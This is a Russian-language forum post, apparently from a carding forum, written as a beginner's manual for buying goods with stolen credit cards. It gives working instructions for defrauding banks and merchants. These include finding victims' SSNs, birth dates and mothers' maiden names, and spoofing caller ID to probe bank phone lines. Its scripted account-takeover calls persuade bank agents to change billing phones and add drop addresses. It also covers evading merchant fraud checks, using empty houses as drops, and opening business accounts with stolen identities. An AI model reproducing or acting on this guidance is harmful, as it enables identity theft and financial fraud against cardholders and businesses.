Методичка по кардингу для новичков

CUK77

Professional
Messages
1,193
Reputation
3
Reaction score
386
Points
83
Глава 1 - Виртуальный Кардинг

Эта Глава посвящена виртуальному кардингу. Виртуальный кардинг, это покупка онлайн с использованием краденой информации о кредитных картах, также известных как “CVV”, “pizza”, “картошка”, под другим именем, и остаться при этом незамеченным. Звучит легко, но на пути очень много препятствий, так как мерчанты, улучшают свою защиту все лучше и лучше. И с каждым днем приходится придумывать новые способы.

1.1 - Как это работает

Первое что вы должны сделать, это спросить себя, сколько вы хотите скардить, и что вы хотите скардить? Затем вы должны определить к какому уровню из 3х завяленных ниже оно принадлежит. Каждый уровень повышает уровень сложности, ниже приведены некоторые особенности.

1 уровень: легкий кардинг

Этот уровень очень легко скардить, к примеру рестораны, телефонные ордера,в большинстве случаев менее 100$. Это отправная точка для большинства кардеров. Для этого вам будут нужны:

CVV

Expiration Date (Дата действия)

2 уровень: средний уровень

Этот уровень используемый для онлайн транзакций немного труднее, для него нужна доп информация, как background reports и т.д. Можно скардить небольшую электронику. Для него вам будут нужны

CVV

Exp date

CCV code

Cardholder name (имя владельца)

Полный адрес Кардхолдера (далее billing address)

Порой, телефонный номер и иная информация из background reports

3 уровень: тяжелый уровень

Этот уровень не рекомендуется для начинающих кардеров. Тут мы будет говорить о больших предметах, дорогой электронике, и многие другие товары из этого уровня, сайтах типа Newegg, TigerDirect, и которые требуют пройти процедуру Account Take-Over (об ATO мы поговорим позднее). Для этого вам будут необходимы:

CVV

Exp Date

Cardholder Name

Billing addres

Телефонные номера

SSN (Social Security Number) вроде ИНН в России

DOB (Date of Birth) дата рождения кардхолдера

Background Report

Если вы нацелены на 1 уровень, вы можете позвонить в пиццерию, и заказать ее на другой адрес, нет надобности описывать это на 2 страницы, это очень легко.

Если же ваша цель 2 уровень, вы можете скардить background report, мелкую электронику, в большинстве случаев менее 300. Все покупки онлайн, и вам нужно будет ввести верный биллинг адрес, адрес доставки и информацию о карте.

Давайте взглянем на сайт который вы хотите скардить, и почитаем их Privacy & Policy, Payment, Shipping rules, если там сказано, что сайт сверяет номер телефона с файлами в банке, мы должны будем внести наш телефон в файлы банка, либо сделать подмену номера (об этом мы говорим в главе 2.1), если же на сайте который мы хотим скардить, ничего такого не написано, мы можем сами позвонить в магазин и спросить. Позвонит ли нам магазин? Это зависит от ордера, их правил, и в вашей подозрительности, однозначного ответа дать нельзя. Запомните успешный кардинг состоит из проб и ошибок.

Когда вы используете одну карту для вбива, не используйте ее для другого сайта, ждите пока ваш товар отправят. Сделать успешный вбив очень легко, но добиться его отправки, это уже совсем другой вопрос.

Вторым уровнем карт очень часто кардят peoplefinders.com. Тут большинство кардеров берут background report. Хорошее место для тренировки ваших навыков.

Теперь поговорим об уровне 3. Вы наверное заметили сколько информации нужно для этих карт, где их взять? Первое пробейте его возраст, если кардхолдеру меньше 40, тут ваши шансы очень малы. В любом случае читаем дальше. Первое что вы должны сделать, это найти правильную карту. Иначе говоря хороший BIN (Bank Identification Number). BIN это первые 6 цифр карты, и используется для определения банка,и типа карты. Чтобы узнать больше посетите сайт Bindb.com, Bins.pro.

Итак у нас есть Debit и Credit карты,и типы этих карт меняются. Перечислю по возрастанию:

Secured: Очень маленькие суммы, обычно до 300

Classic: Маленькие суммы, иногда до 1000

Gold: Средние суммы, обычно до 3000

Platinum: Большие суммы, обычно до 8000

Business: Очень больше суммы, обычно до 15000 и больше

Signature: Самые лучшие карты, мне попадались карты которые имели 80000 кредитного лимита

Запомните эти цифры могут быть неверны, все зависит от credit score, истории, и сумм которые использует кардхолдер. По своему опыту скажу,что debit карты, очень часто не хватает сумм, и у них более строгая защита для онлайн покупок. Говоря другими словами, их лучше не использовать для кардинга уровня 3, а использовать для 1-2 уровня. Зарегистрируйте аккаунт на любом поисковике SSN, вроде ssnfinder.ru или ssndob.cc (базы поновее). Можно пробивать у других селлеров.

Теперь ищем нашего кардхолдера, пока идет поиск, идем на peoplefinders.com и достаем полную информацию цели, можете легко скардить его, используя карту 2 уровня. Когда вы все нашли, проверьте чтобы адрес и дата рождения совпадали. Если все совпадает, полагаем что SSN будет верен. Используйте логику, чтобы убедиться что вы верно сопоставили информацию,и нашли того кто нам нужен.

Для информации: Около 80% старше 40 лет, могут быт найдены.

Нашли верный SSN и DOB? Круто! Теперь время найти девичью фамилию матери. Это немного сложно, и в основном работает на людях их следующих штатов: Arizona, California, Delaware, Idaho, Indiana, Kentucky, Maine, Maryland, Massachusetts, Minnesota, Nevada, New Hampshire, New Jersey, Ohio, Rhode Island, South Dakota, Texas. Топайте на сайт Archives.com и скардите там подписку, в background report взятого с сайта peoplefinders.com, вы должны найти мать кардхолдера, проверьте имя и дату рождения. И сопоставьте ее с данными с archives.com,там есть записи о замужестве, и ее предыдущая фамилия. Это работает примерно в 50% случаях.

Зачем нам нужна эта информация? Потому что большинство сайтов уровня 3, имеют VBV/MCSC защиту при чекауте. Это услуга предоставляемая банком для защиты, и дополнительных вопросов.

Каждый тип карты защищен по разному, обычно вопросы:

Date of Birth (Дата рождения)

Last 4 digits of SSN (последние 4 цифры SSN)

Full name on card (Имя на карте)

Billing zip code (почтовый индекс адреса кардхолдера)

Если вы не ответите на один из этих вопросов, ордер не пройдет. Но у нас ведь все есть? Потому что мы пройдем процедуру ATO (account take over fraud). Это сложная и хитрая процедура. Читайте следующую главу, где я опишу ее более детально.

1.2 – Account Take-Over Fraud

Вы мечтаете о кардинге электронике и вещей, чья стоимость исчисляется тысячами? Это возможно но трудно. Вы должны следовать в верном направлении. Я скардил цифровой техники более чем на 15000 за 2 недели, используя платиновые карты, используя шаги описанные в данном мануале. Постараюсь вам объяснить как.

Первое, проверьте баланс на вашей кредитке. Чтобы не выглядеть дураком, запомните одно из правил: НИКОГДА НЕ ИСПОЛЬЗУЙТЕ ЧЕКЕРЫ! Они убивают карты очень быстро. Давайте я объясню.

Каждая транзакция получает fraud очки от 0 до 999. Эту систему используют крупнейшие 4 банка,и она называется Fair Issac. Транзакции которые набрали более 300 очков, будут проведены в ручном режиме оператором, который решит, связаться с кардхолдером или пропустить перевод. Транзакции набравшие более 500 очков подлежат авто отмене, карта заблокируется, и оператор свяжется с кардхолдером. Некоторые банки используют другие критерии, но принцип, остается таким же, и вещи которые добавляют fraud очки:

Сравнение с суммами которые картхолдер использовал до этого

Физическое расположение вбива

Сумма

Риск фактор используемый самим мерчантом

К примеру, 20$ потраченные картхолдером в локальном Wallmart, не вызовет ничего подозрительного, но большой ордер на 2000$ на Newegg.com, сразу наберет много fraud очков, и скорее всего будет подлежать авто-отмене транзакции, если кардхолдер, очень редко совершает покупки онлайн.

Но как это все относится к тому что я говорил? Маленькая транзакция, а затем большой ордер, сразу наберет большой fraud score, потому что они догадываются, что вы тестите карту. Если они видят, маленький 0.01$-5$ чардж, а через некоторое время, онлайн покупку на 1000$, они автоматом задеклайнят карту, и ваш план обрушится.

Есть способы намного лучше как проверить карту на работоспособность: позвонить в банк и

использовать автоматические ответы. Это никак не опасно для карты, но используйте Spooftel, чтобы ваш номер отображался, как номер картхолдера. Когда вы это сделали позвоните в банк и проверьте сколько осталось на карте. Давайте попробуем.

Позвоните в банк используя ваш телефон, и будьте готовы передать информацию, которая нужна банку. Робот даст вам доступ, к последним транзакциям, балансу, и некоторым другим опциям.

Перечислю вам информацию для крупнейших 4х банков:

Chase Bank – 1-800-432-3117

Full card number

Zip code

Примечание: если вы правильно заспуфали номер, у вас попросят только последние 4 цифры на карту, в ином случае вас попросят передать полный номер карты.

Citibank – 1-800-627-3999

Full card number

Last 4 digits of SSN

Bank of America – 1-888-421-2110

Full card number

Zip code

Capital One – 1-800-955-7070

Full card number

Last 4 digits of SSN

Если в каком либо банке, вы ввели номер карты, и система немедленно перенаправила ваш звонок оператору, без каких либо вопросов, это значит, аккаунт заблокирована, и карта невалидная. Не стоит тратить время, на эту карту, просто положите трубку, и используйте другую карту, оператор скажет вам тоже самое и вы будете выглядеть дураком. Это очень хорошо знать последние транзакции, суммы, так как вас возможно спросят об этом позже. Запишите их где либо, для большей убедительности, рекомендую записать до 8 транзакций.

Итак нам известен баланс, и наш кредитный лимит. КРУТО! Теперь вы знаете сколько вы можете потратить онлайн. Перед тем как побежите со слюнями вбивать, запомните пару вещей, много больших сайтов таких как Newegg или TigerDirect, не отправляют на адрес которого нету в записях банка. И шансы того что вы удачно скардите товар очень малы. Так давайте попробуем решить эту проблему, представляю вам Account Take Over fraud, иначе известный как ATO.

ATO это процесс, когда мошенник (вы) звонит в банк, и вносит изменения которые он хочет, без ведома картхолдера. Это предполагает звонок с оператором и использование соц инженерии.

Перед тем как вы даже подумаете нажать 0 для разговора с оператором, убедитесь что у вас хотя бы есть эта информация в руках:

Все данные CVV

Full Billing address

DOB также запишите сколько точно лет картхолдеру, а не только дату рождения

SSB

MMN(Mothers Maiden Name) девичья фамилия матери

Employer Name (имя работодателя) необязательно, но постарайтесь найти в facebook

Модель Машины - Необязательно, но попробуйте использовать Google street view указав адрес картхолдера

Driver’s License Number, Expiration, State (данные водительских прав) необязательно

Предыдущий адрес (используйте информацию из peoplefinders.com)

Background Report (используйте информацию из peoplefinders.com)

В тех случаях когда вам неизвестен MMN, попробуйте использовать другие фамилии в background report, думайте логически. Если действительно ничего нет, постарайтесь найти все остальное. Выучите их, и постарайтесь запомнить. Запомните вы картхолдер, карта принадлежит вам, и вы честны, просто звоните так, будто вы обращаетесь действительно в свой банк.

Обычно при звонке в банк, спрашивают 3 вопроса, этими вопросами могут быть: DOB, SSN, Address, CVV code, Cell Phone, MMN. Если провалите один вопрос, вам будут заданы еще два. В конечном случае могут случиться 2 вещи:

вы сделали все правильно, и оператор сделает все что вы попросите, на аккаунте картхолдера, без каких либо красных флагов

оператор заподозрит ATO, и переведет ваш звонок в отдел безопасности, также его называют Verid department, и вам будут заданы 2 OoW (Out of Wallet) вопроса. Это вопросы которые не относятся к вашему банк аккаунту. Эти вопросы основаны, на информации из background reporta, кредитной истории и т.д Вопросы могут быть сложными и легкими, это рандомно всякий раз. Если вы провалите их, то они скажут, что ничем не могут помочь, и вы должны придти в банк лично. Также они позвонят картхолдеру. Так что можете забыть о карте.

Первое что вы должным сделать это поменять, биллинг телефон. И все. Больше ничего не

делайте, так как это вызовет подозрения. Попросите поменять биллинг номер и дайте отлежаться

карте, хотя бы 5 дней.

И так, прошло время, вы готовы? Расслабьтесь, сядьте в свою удобную позу, звоните в банк, послушайте робота, и нажмите 0. Ваш звонок будет записываться.

Первый пример, если у вас есть верный MMN (это самый часто задаваемый вопрос)

Агент: Здравствуйте, спасибо что позвонили в Chase, меня зовут Ник, с кем я говорю?

Вы: Джимми Стоун

Агент: Спасибо, мистер Стоун, могу ли я в целях безопасности, узнать девичью фамилию матери?

Вы: Донован

Агент: Спасибо, год вашего рождения?

Вы: 1 октября, 1965.

Агент: Спасибо мистер Стоун, чем я могу помочь вам?

Перейдем ко второму примеру когда у вас нету MMN, постарайтесь угадать, не колеблясь, вы знаете себя лучше, чем оператор, и они могу только положиться на информацию которая записана у них в файле.

Агент: Здравствуйте, спасибо что позвонили в Chase, меня зовут Ник, с кем я говорю?

Вы: Джимми Стоун

Агент: Спасибо, мистер Стоун, могу ли я в целях безопасности, узнать девичью фамилию

матери?

Вы: Донован

Агент: Но в файле совсем другая фамилия, она начинается на “С”.

Вы: На “С”? это невозможно, ее имя было, Кейт Донован, она никогда не использовала другое имя!

Агент: Эмм, у вас нету никакого приходящего в голову имени начинающегося на “C”? (Если вы смогли найти что либо подобное из родственников в background report)

Вы: Фамилия моей тети Смит. Но я сомневаюсь, что у вас в файле записана эта информация.

(если же в background ничего нет)

Вы: Нет, никто в моей семье не имеет фамилию, начинающуюся на “C”

Агент: Оу, позвольте мне внести заметку в файл для вас, можете ли вы назвать последние 4 цифры вашего SSN?

Вы: 4456.

Агент: Спасибо, дата вашего рождения?

Вы: 1 Октября, 1965.

Агент: Ваш биллинг адрес, и зип код?

Вы: 123 Fake Street, Fakeville, NY, 10008.

Агент: Спасибо, мистер Стоун, чем я могу помочь вам сегодня?

Если вы услышали эту фразу, вы все еще в игре. В другом случае вы будете перенаправлены в отдел безопасности, которые зададут вам вопросы из бэкграунда. Облажаетесь, карта мертва. Убедитесь что вы спуфнули телефон, иначе вам зададут дополнительные вопросы. Вопросы на которые у вас скорее всего нет ответа.

Мы должны поменять, биллинг номер. Примерный диалог будет таким:

Вы: Я хотел бы поменять, свой биллинг номер, этот номер будет отключен завтра, и я хотел бы

дать вам свой основной, чтобы вы могли позвонить мне в случае чего.

Агент: Хорошо, я вижу, можете ли вы продиктовать номер?

Вы: 234-567-8901.

Агент: Спасибо, что нибудь еще?

Вы: Нет, спасибо.

Агент: Спасибо, за то что позвонили в Chase

Когда мы прошли верификацию, можно расслабиться. И дать карте отлежаться 5 дней, не совершайте никаких покупок, картхолдер будет продолжать использовать карту. Во время вашего звонка на примере 1 (когда вы облажались, но методом СИ смогли убедить оператора), убедитесь что они исправили MMN, чтобы избежать проблем при следующем звонке. Также возьмите на заметку, если оператор ставит вас на холд, или говорит вам что ей надо проверить информацию, и вы должны подождать на проводе, подождите пока они поставят линию на удержании, и положите трубку. Обычно это значит что они собираются позвонить кардхолдеру. Если такое случается, подождите пару дней, перед тем как позвонить еще раз, и у робота вы узнаете, заблочили карту или нет. Возможно что они не позвонили ему, но в 90% случаях, они звонят. Особенно любят эту процедуру Ситибанк, которые вместо перенаправления в отдел

безопасности, просто звонят кардхолдеру.

Часто вопросы меняются от звонка к звонку, но в принципе они одинакового содержания. По своему опыте я дам вам вопросы, которые обычно задают крупнейшие 4 банка, но имейте ввиду, они могут спросить совершенно другие, если подозревают что то неладное. Они могут спросить сколько вам лет, надеясь что вы не посчитали это до звонка. Если вы провалитесь, вы будете разговаривать с verid department.

Chase Bank, уровень : тяжелый

Full name

MMN (if failed, last transaction)

Last 4 of SSN

Citibank, уровень : средний

Full name

Password (pet name, MMN, favorite hobby, or best friend, if failed, last 4 of SSN and CVV)

Mailing address

Phone number

Bank of America, уровень : легкий

Full name

(sometimes) Verbal password, which is MMN (if failed, DOB)

Last 4 of SSN

Capital One, уровень : средний

Full name

Last 4 of SSN

MMN (if failed, DOB and mailing address)

Пока карта на отлежке, неплохо было бы создать аккаунт, на сайте который вы собираетесь кардить, осматривайте товары, положите в корзину, идите чекаут, идите назад, удаляйте товары с корзины, читайте описание, просто ведите себя так как обычный покупатель. Запомните, 1000$ это большие деньги для большинства американцев, и если вы просто кидаете товары в корзину не обращая внимания на цены, вы набираете fraud очки. Ведите себя так, будто вас очень даже заботит сколько стоит тот или иной товар.

Как только вы пройдете верификацию один раз, в следующий раз будет легче, для этого аккаунта. Допустим что 5 дней прошли, позвоните опять, и в этот раз мы добавим временный адрес, к аккаунту. Диалог может быть примерно таким:

Вы: Я хочу купить вещь в Newegg.com, но они просят меня внести временный адрес доставки в файл. Я не очень уверен как это все работает, могу ли я вам просто сказать адрес, куда они должны его доставить?

Агент: Позвольте мне помочь с этим, мы можем добавить альтернативный адрес, доставки, не могли бы вы назвать мне адрес?

Вы: 123 Fraud Street, Cardingville, CA, 98765.

Агент: Без проблем, мистер Стоун, я внесла данный адрес в файл, в качестве адреса доставки, могу ли я, еще чем нибудь вам помочь?

Вы: Нет, спасибо

Агент: Удачного вам вечера

Почти все банки за исключением, Bank of America, которые меняют только почтовый адрес. Это причина по которой, карты данного банка, не подходят к 3му уровню, но некоторые магазины, могут создать конференцию, и позвонить банку, для пущей безопасности. Chase Bank лучше всего добавляет Shipping address, но сложнее всего сделать ATO, это все зависит от вас, вашего уровню и умения.

Как только вы добавили адрес в аккаунт, время для вбива, зайдите в свой аккаунт в магазине, поковыряйтесь в магазине еще. Постарайтесь, не делать ордер больше 2000. Введите верный верный биллинг адрес, проверьте информацию несколько раз. Введите биллинг номер телефона (который мы уже добавляли). Затем ваш Shipping адрес. Проверьте еще раз. И отправляйте. У вас могут спросить VBV или MCSC, но ведь у нас есть вся информацию. Введите инфу которую они хотят, и подтвердите ордер. Также некоторые большие сайты, спросят у вас DOB, а также 3 вопроса, вопросы взяты из public records,и для нас они не должны предоставлять большой сложности. Если вы провалитесь, вам будут заданы еще вопросы. Если вы облажаетесь с двумя и более, ордер будет поставлен на ожидание, и вы все усложните, постарайтесь все сделать верно. Могут случиться 2 вещи, когда вы подтверждаете ордер. Это зависит от сумм которые тратил кардхолдер до этого, и это усложнит или облегчит задачу для вас

Ордер пройдет без проблем, и он будет в статусе *ожидание*

Транзакция отклонена, и на сайте будет написано позвоните в банк. Если это случилось, позвоните в банк, система отреагирует что карта угнана, и без всяких ответов вас перенаправят. И фрод агент ответит вам. Помните, карта ваша, скажите им что вы авторизуете транзакцию, и вы понятия не имеете почему она отклонена. Обычно это легко, если у вас есть необходимая информация. Звоните сразу как вы получите деклайн, иначе картхолдеру позвонят, и ваш план выгорит.

Итак, ордер отправлен в статус ожидания. Следующей частью я расскажу вам, почему некоторые ордера отменяются. Наберите терпения, вздохните, и переходите к следующей части.

1.3 - Почему ордера отменяют

Когда сайт получает ордер свыше 1000$, мы должны понимать,что они хотят защитить себя. Что они делают в первую очередь, для того чтобы верифицировать транзакцию? Правильно, они просто звонят в банк, и сверяют биллинг номер, либо звонят на него. Звонок будет совершен к вам, или картхолдеру, зависит от того, сделали ли вы правильно ATO.

Эта причина почему новички, вбивают данные кредитки, и надеются получить бесплатный Iphone от Apple store. Они не дураки и они хотят защитить себя. В любом случае, если вы поменяли биллинг номер, вам позвонят, и вы подтвердите ордер. Не так быстро, звонок от них это не просто “хей, все в порядке?”, обычно это звонки при которых они проверяют настоящий ли это кардхолдер, и иногда спрашивают вопросы, близкие к тому что задавал вам Verid department банка, но все они взяты из Public Records. Также они спросят у вас по поводу shipping адреса, который мы благополучно внесли в файл, также позвонят в банк. В редких случаях, они создадут конференцию с вами и банком, но вам будут заданы обычные вопросы вроде, последних 4х цифр SSN, DOB, последние транзакции и т.д Если вы новичок, попробуйте просто сделать вбив, в надежде получить телефон нахаляву, вы просто увидите как ваш ордер отменят, даже не удосужив вас звонка. По этой причине, я часто вижу посты типа “Кардинг уже мертв”.

Если вы прошли верификацию, оператор скажет вам, что все ок, и ваш ордер будет отправлен вам сегодня. Отличная новость! На этом этапе я получил 100% своих ордеров. У меня никогда не было проблем, после верификации. Теперь вы можете попробовать скардить другой сайт. Вашу карту уже можно отнести к 4 уровню. Потому что аккаунт полностью в вашем распоряжении, и вы совершали с него покупки, с вашим биллинг номером и шипинг адресом. Дожидайтесь пока ваши ордера будут отправлены, и переходите к следующему магазину.

Я рекомендую, кардить утром, чтобы избежать долгого чарджа на карте. Вы не можете знать, как часто кардхолдер проверяет стэйтмент. У меня были карты которые умирали за час, а некоторые жили по 3 месяца. Как только пак отправлен, переходите к следующему магазину, пока она не умрет. Как только, карта умерла, не связывайтесь никак с дропом, если вы юзаете человека, или не появляйтесь по адресу, если в качестве дропа вы используете съемную квартиру. По альтернативному адресу доставки они могут отправить полицию на это место. Дроп он как презерватив, используйте его, затем выкиньте, больше им пользоваться нельзя.

1.4 - Дропы

У многих наших кардеров, понятие дроп, связано с человеком, которому отсылают паки, и он перенаправляет товар далее. Не буду описывать этот процесс, он итак всем известен.

В качестве дропа можно юзать квартиры, склады куда отправляется добро. Это должно быть место никак не связаное с вами. Найти очень легко, зайти на craiglist и найти дом в аренду, либо проехать по району, и поискать дома для продажи которые обычно пустуют, удостоверьтесь, чтобы в нем не было больших окон, в котором видно что дом пустует. И это не должна быть палатка, или какая нибудь страшная халупа, найдите достойное жилище, они не так дороги.

И вот этот день настал, на трэке появилась надпись “Out for delivery”. Круто! Теперь проверьте нужна ли подпись. Все почтовые службы требуют подпись, кроме UPS.

Метод 1: Дома никого нет

Если подпись не нужна, можно оставить записку на двери, “Дома никого нет, пожалуйста оставьте пак здесь, это возьмите как подпись”, также можно оставить напечатанный ордер конфирмэйшн, в котором виден трэк номер. Дальше зависит от водителя, оставить пак или нет, обычно они без проблем оставляют пак. Как только он уехал, берите товар и валите. Если все хорошо можете пропустить 2 метод, и продолжите чтение.

Метод 2: Ведите себя так, будто вы у себя дом

Обычно он нужен, для паков где, подпись в любом случае нужна, вам нужно будет встретиться лицом к лицу с водителем. Запомните одну вещь, можете расслабиться. Работа водителя не ловить мошенников, а просто убедиться в том что, пакет, доставлен по назначению (но в лицо ему это говорить тоже не надо), ваша задача просто в том, чтобы убедить его, что пак ваш, на остальное им наплевать, вынесите напечатанный confirmation page, track номер, откройте ваш телефон поглядывая на часы (используйте VPN!), будто бы вы ждете его. Если вы ждете у дропа, уберите все надписи “for sale”, “for rent”, и сидите на траве, что угодно, также не забудьте позвонить в банк, и узнать у робота, жива ли карта, дабы удостовериться, что вместо почты к вам не едут копы. Также запомните что если вы выходите из машины, когда почтальон приезжает, вызовет у него подозрения. Поприветствуйте его, покажите бумаги, подпишите, и переходите к следующей части.

Иногда водители могут выебываться, и спрашивать, почему ваше имя, не такое же, как на паке, вы можете сказать что, что вы переехали, и послали на чужое имя, потому что у вас проблемы с таможней, если они и дальше будут выебываться, можете сказать ему что позвоните в UPS, и оставите жалобу, обычно они успокаиваются после этого, короче говоря, с приемом паков у меня

проблем не было.

После того как пак получен

Иногда я пропуская эту часть, так как ленивая сволачь, но вы должны быть очень осторожны, ваша свобода бесценна, и 5 минут стоят того. Проедьте к ближайшему парку или публичному месту, проверьте пак на наличие, жучков, GPS приемников и т.д, затем уничтожьте лэйбл, и выбросьте коробку. На данном этапе, вы можете быть уверены, что вы охуеть какой классный кардер. Едьте домой, расслабьтесь, вы уделали банк, и сайт, можете повыебываться этим на форумах. Если карта до сих пор жива, и никаких жучков вы не нашли, вы можете делать то же самое с дропом опять и опять, пока карта не сдохнет. Как то раз, я накардил электроники, на 14000 на одну карту - это была, денежная неделя.

1.5 – Chargebacks

Постоянный вопрос на форумах, когда карта умирает, и открывается диспут, кто попадает под удар?

В случаях когда карта используется с чипом и пином, в тех странах где используется эта технология, банки несут потери, при таких диспутах.

В других случаях, всю материальную ответственность, к сожалению несет продавец. К примеру если вы скардите ноутбук на newegg на 2000$, они понесут убытки около 1600$, потому что вы украли у них, и теперь они должны продать 5 таких же ноутбуков, чтобы просто покрыть убытки.

Теперь вы понимаете почему такие большие мерчанты как TigerDirect и Newegg, делают так улучшают свою защиту, чтобы их не скардили. В большинстве случаев, они смиряются с этим и, понимают что они облажались в защите. Но мерчанты поменьше, обращаются в полицию, будет ли полиция расследовать это? Это зависит от суммы, к примеру, если мерчант заявит о 200$, в 99% они даже дело не будут открывать. Но если это будет 3000$, с одного штата, с доставкой в

ближайший город, они могут заняться этим.

Также это зависит от частоты обращений, и общей сумме, они могут связать все, и понять что это один человек. Старайтесь, проводить все ваши ордеры, без общей связи.

Также зависит от картхолдера, который решит, писать заявление или нет, но обычно все затраты им возмещает банк, и шансы что они сделают это чрезвычайно малы. Но есть придурки для которых это принципиально, и они будут обращаться в полицию опять и опять. Опять же, это все рандомно, и зависит от многих факторов, также от того в каком именно городе, произошла кража.

Так что запомните, когда вы кардите магазин, они несут от этого убытки, и они хотят защитить себя. Так что вы должны быть умны, и представить себя на месте, хозяина, как мне не дать обмануть себя мошенникам? Иногда вы будете получать, емейлы от магазинов, спрашивающих вас о chargeback’ах, игнорируйте эти письма.

1.6 – Выбираем лучшие карты

Если у вас нету возможности достать Full’ки, а в наличии только автошопы, есть способ, как выжать с них самое лучшее, и сохранить свои деньги, но для этого нужно немного больше времени. Это работало на многих автошопах до поры времени, когда до покупки карты были видны, имя и зип код карты. На некоторых автошопах эта инфа есть до сих пор.

Первое, начинаем поиск по бину. Если вам понравился работать методом ATO, и вы хотите хорошие карты, бины 426684 и 438854 отлично подойдут для этого, но конечно же, все зависит от вашего желания. Итак вы взяли карту, самое время попробовать найти их SSN, DOB, на Backstab, SSNFinder или SSNDOB, в 50% вы не найдете особенно если кардхолдер моложе 40 лет. Просто оставляем эту карту для уровня 2 или для шопов с слабым антифродом, шопы с хорошим антифродом, без полной информации не сможете взять. Итак допустим у нас получилось найти SSN и DOB.

Идем на peoplefinders.com и находим background, сравните DOB c тем что у вас уже имеется, логически сопоставьте информацию, чтобы убедиться,что вы правы на 100%. Теперь у нас есть Full’ка. Теперь можно переходить на archives.com или ancestry.org, чтобы найти MMN (девичья фамилия матери). Поделюсь как искать:

Скардите аккаунт на одном из 2х этих сайтов, можно использовать карты 2го уровня, не должно доставить проблем, это легко. Возьмите имя матери кардхолдера из background report’а, и ищите ее по ФИО и дате рождения, укажите “marriage (замужество) records”, если поиск ни к чему не привел, ищите “birth records”. Если и там ничего нет, попробуйте поискать по данным женитьбы отца кардхолдера. Не все штаты, сделали все эти записи публичными, потому возможно что вы ничего не найдете, но не стоит расстраиваться. Мы всегда можем применить соц инженерию, как мы уже делали это. Конечно, найти продавца фуллок намного упростит нам дело, но их не так много, а еще меньше действительно с хорошим материалом. Если вы найдете автошопы которые предполагают посмотреть ФИО и zip до покупки, замечательно! Просто проделайте то, что было описаны свыше. И проверьте баланс звонком в банк.

1.7 - Коммерческий Кардинг

Хотите другой способ (я так полагаю легче), чтобы вещи были посланы дропу, и устали от кардинга, newegg и bhphoto? Ок, поделюсь с вами еще одним методом. Этот метод работает лучше всего для Канады, но также хорош для США.

Вам нужно найти любого крупного продавца, который продает только коммерческим покупателям (что значит только для владельцев бизнеса). Допустим для кардинга компьютера и их запчастей, вы можете попробовать ASI, Synnex, и так далее. Наша цель найти регистрационный сертификат, в том городе котором вы планируете дроп товара. Эти сертификаты обычно публичные, и могут быть найдены на многих сайтах, зависит от штата. Помните вы всегда можете скардить подписку, на сайтах где эта инфа предоставляется. Как только вы достали сертификат, мы готовы атаковать. Подайте заявку для регистрации, внесите все данные, также внесите адрес дропа, и постарайтесь чтобы он был как можно ближе, также внесите номер, по которому они могут позвонить вам. Оба этих шопа (Synnex,ASI) обычно не звонят, но это на всякий случай. Чтобы ваш аккаунт подтвердили обычно уходит 1-2 дня. “Ваше имя” это имя настоящего владельца бизнеса. На Credit application просто напишите “no credit”, и дайте им понять, что вы оплатите до того как товар будет отправлен.

На Credit authorization form, внесите имя, адрес, номер карты, exp.date, cvc code. Дайте им поменять, что этот человек, вроде менеджера или торговый представитель в вашем бизнесе. Как только вашу заявку подтвердили, мы готовы делать ордера на большие суммы. Причина по которой они не проводят верификацию, при отправке товара, это то, что у них почти никогда не бывает фрод ордеров. Они полагают что комерсы, всегда все делают по закону,но по закону, мы просто использовали чужие документы, чтобы они подумали, что мы владельцы бизнеса. Я вносил ордера более чем на 5000$ используя этот метод, мерч считает эту операцию лоу-рисковой, потому у меня было очень мало деклайнов на карте, а верификация почти отсутствует.

Вы можете попробовать других коммерческих продавцов. Теперь вы играете в большую игру, и ваши возможности безграничны. И да никогда не появляйтесь на месте дропа товара, потому что, когда карта умрет, они действительно захотят понять что же произошло.

1.8- NewEgg и TigerDirect

Всегда хотели скардить, эти 2 мерчанта, чтобы получить электронику? Постараюсь объяснить вам как. Это не самое сложное, если вы знаете что делать, и у вас есть навыки в соц.инженерии. По крайней мере вам будут нужны:

ATO аккаунт кардхолдера, с номером который вы поменяли на свой

Адрес доставки указанный в файле банка

Полная инфа из бэкграунда

История о том, почему вы хотите доставить на этот адрес

Район обитания кардхолдера: рестораны, торговые центры

И запомните, адреса мэйл форвардинг компаний в блэклистах у этих шопов. Не пытайтесь шипать на MyUS, Bongo, Shopfans и так далее, ордер автоматом отменят. Какой американец будет US карту, для доставки в форвардинг компанию, чтобы те отправили его дальше? Ни один. Вам нужен нормальный дроп. Условие номер 5,кажется странным, но это правда. Некоторые операторы, включая меня могут спросить, “можете ли вы назвать ресторан, который находится возле вашего дома?” чтобы убедиться что вы и есть кардхолдер. Так что неплохая идея, просмотреть окрестности, если вдруг такое случится. Вы поблагодарите себя затем.

Ну давайте займемся серфингом по сайту, читайте описания, осматривайтесь, ведите себя как обычный покупатель. Проделайте это 1-2 дня, отправляйте ордер, и старайтесь не делать ордер больше 2000$. Ордер будет в статусе “ожидание”, и вы должны будете поговорить с verification department. Я объясню вам, процедуру для TigerDirect, но Newegg несильно отличается.

Сайт TigerDirect попросит вас предоставить адрес и информацию о кредитке, затем вы должны будете пройти процедуру VBV/MCSC. После этого, они спросят дату рождения. Затем 3 проверочных вопроса. Эта информация взята из бэкграунда. Постарайтесь найти всю информацию которую сможете. Ответьте на 3 вопроса, настолько быстро как сможете, не думая долго. Если вы провалите один вам будет задан еще дополнительный, ответите неверно 2 или более, забудьте о карте. Как только вы прошли это ваш ордер будет в статусе ожидания. Вы должны позвонить в verification department. Обычно диалог проходит следующим образом:

Агент: Спасибо что позвонили в TigerDirect verification department, могу я узнать номер вашего ордера?

Вы: 123445

Агент: Спасибо, как вас зовут?

Вы: Джим Стоун

Агент: Спасибо мистер Стоун, позвольте мне проверить ваши данные (вы будете на удержании, около 2 минут)

Агента: Спасибо за ожидание, (имя на ордере) арендатора в адресе доставки?

Вы: Да (другой ответ, задейклайнит ордер)

Агент: Я не могу найти этого человека в системе. Поэтому мы можем сделать 2 вещи. Мы доставим товар по вашему билинг адресу, или вы должны будете позвонить в банк, чтобы указать его в качестве альтернативного, и мы сможем отправить его туда

Вы: Я уже позвонил в банк, и они добавили этот адрес в файл

Агент: Оу, тогда позвольте мне проверить эту информацию, пожалуйста подождите (вы будете на удержании, пока они звонят в банк, чтобы проверить информацию, иногда они могут создать конференцию с банком и вами)

Агент: Все в порядке, адрес доставки указан в файле. Спасибо, могу ли я позвонить вам по номеру 917-603-0141? (номер который мы указали в качестве основного кардхолдера)

Вы: Да конечно

Агент: спасибо, ожидайте на линии. (телефон должен зазвенеть, поднимите трубку, либо ордер отменят)

